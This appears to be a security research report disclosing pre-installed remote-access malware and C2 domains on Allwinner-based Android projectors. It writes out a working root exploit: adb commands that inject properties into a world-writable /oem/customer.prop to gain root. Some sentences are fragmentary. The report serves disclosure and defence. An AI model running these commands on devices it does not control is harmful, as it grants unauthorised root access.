
Breakdown of a c2-network of chinese beamers - SilentSDK-Analysis
Technical Analysis Report — Security Research
Affected Devices: Multiple Android projectors of beamer brands like the Nonete (e.g., Model HY260Pro) (likely also several projectors from Magcubic, Hotack, Huyukang and many more, as these companies distribute similar models and there are indications supporting this)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–17, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload
api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span possibly multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13). The pattern matches the BADBOX cases.
Purchased Device: Amazon Link - Nonete Mini Beamer 4K 1080P
| Property | Value |
|---|---|
| Brand Name | Nonete HY260Pro (model sold by multiple companies) |
| Internal Model Name | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Operating System | SpectraOS (Android 11, Kernel 5.4.99) |
| Real Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Spoofed Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (no enforcement) |
| Platform Signing Key | Public AOSP Test Key |
| OEM Certificate | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Firmware Channel | HY260Pro_SpectraOS_TPYB |
Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.
| Step | Action | Result |
|---|---|---|
| 1 | Wireshark capture of network traffic | HTTP traffic to store-api.aodintech.com |
| 2 | Decoding of the gzip-compressed C2 response | 7 apps, including hidden "SilentTools" |
| 3 | AES-CBC decryption of the download path | Key [REDACTED], URL to .bpp file |
| 4 | Root exploit via /oem/customer.prop | uid=0(root) after property injection |
| 5 | Forensic dump of /data, /oem, /system | APKs, databases, configurations |
| 6 | Static analysis of StoreOS DEX | pm install -r -d, byte-reversal protection |
| 7 | Reverse engineering the reverseLen mechanism | Understanding of the anti-analysis protection |
| 8 | Breaking the byte-reversal protection | Decrypted, analyzable SilentSDK DEX |
| 9 | XOR decryption of SilentSDK strings | C2 domain api.pixelpioneerss.com confirmed |
| 10 | Hash verification across three sources | MD5/SHA-256 match perfectly |
| 11 | Reverse engineering the malware download process | Servers still online |
| 12 | Reverse engineering the malware | Plugin-based Rat Framework |
Root access was achieved through a combination of three vulnerabilities:
/oem — The partition is mounted as FAT with fmask=0000.customer.prop loaded at boot — Overwrites system properties.adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writable
adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop'
adb shell 'echo "service.adb.root=1" >> /oem/customer.prop'
adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root
adb shell id
# uid=0(root) gid=0(root) context=u:r:su:s0
Impact: Any user with physical access or an attacker on the same network (via ADB, port 5555 open, no authentication) gains full root access.
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
The gzip-compressed response contains a JSON list with seven apps. Six of them are regular streaming apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). The seventh is SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |